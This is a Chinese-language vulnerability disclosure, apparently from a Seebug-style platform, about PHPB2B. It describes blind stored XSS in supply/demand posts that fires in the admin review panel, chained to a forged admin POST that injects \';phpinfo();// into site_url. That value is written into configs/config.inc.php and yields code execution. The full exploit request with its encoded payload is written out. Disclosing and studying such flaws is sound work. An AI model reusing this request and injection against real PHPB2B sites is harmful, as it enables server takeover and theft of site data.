### 简要描述:
PHPB2B 存在多处xss。
可盲打后台且getshell。
官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip
### 详细说明:
ex:
发布供求信息
[<img src="https://images.seebug.org/upload/201410/2503292064ea77aad6bbad57a360a8e1ffaaf50e.jpg" alt="x.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/2503292064ea77aad6bbad57a360a8e1ffaaf50e.jpg)
管理后台审核供求信息:
[<img src="https://images.seebug.org/upload/201410/25033143090245d1dbda7e2a40e54f01e5f8ce4b.jpg" alt="x1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/25033143090245d1dbda7e2a40e54f01e5f8ce4b.jpg)
执行post操作
data[Bsetting][site_url] 存在configs/config.inc.php中。
修改site_url为\\';phpinfo();//
pkav.post("http://localhost/phpb2b/pb-admin/setting.php?do=basic","data%5Bsetting%5D%5Bsite_name%5D=%E5%8F%8B%E9%82%BBB2B%E8%A1%8C%E4%B8%9A%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E7%BD%91%E7%AB%99%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F&data%5Bsetting%5D%5Bsite_title%5D=%E5%8F%8B%E9%82%BBB2B%E8%A1%8C%E4%B8%9A%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E7%BD%91+-+Powered+By+PHPB2B&data%5Bsetting%5D%5Bsite_banner_word%5D=%E6%9C%80%E4%B8%93%E4%B8%9A%E7%9A%84%E8%A1%8C%E4%B8%9A%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E7%BD%91%E7%AB%99&data%5Bsetting%5D%5Bsite_logo%5D=static%2Fimages%2Flogo.jpg&data%5Bsetting%5D%5Bsite_url%5D=\\';phpinfo();//%2F&data%5Bsetting%5D%5Bicp_number%5D=ICP%E5%A4%87%E6%A1%88%E5%8F%B7%E7%A0%81&savebasic=%E6%8F%90%E4%BA%A4",function(rs){});
成功写入configs/config.inc.php
### 漏洞证明:
写入配置文件
[<img src="https://images.seebug.org/upload/201410/25033413d34213c5153725c75ce1b0c1bba03b04.jpg" alt="x2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/25033413d34213c5153725c75ce1b0c1bba03b04.jpg)
成功执行:
[<img src="https://images.seebug.org/upload/201410/250335013994f9203554fa068c71887b31c0829d.jpg" alt="x3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/250335013994f9203554fa068c71887b31c0829d.jpg)
京公网安备 11010502034610号
暂无评论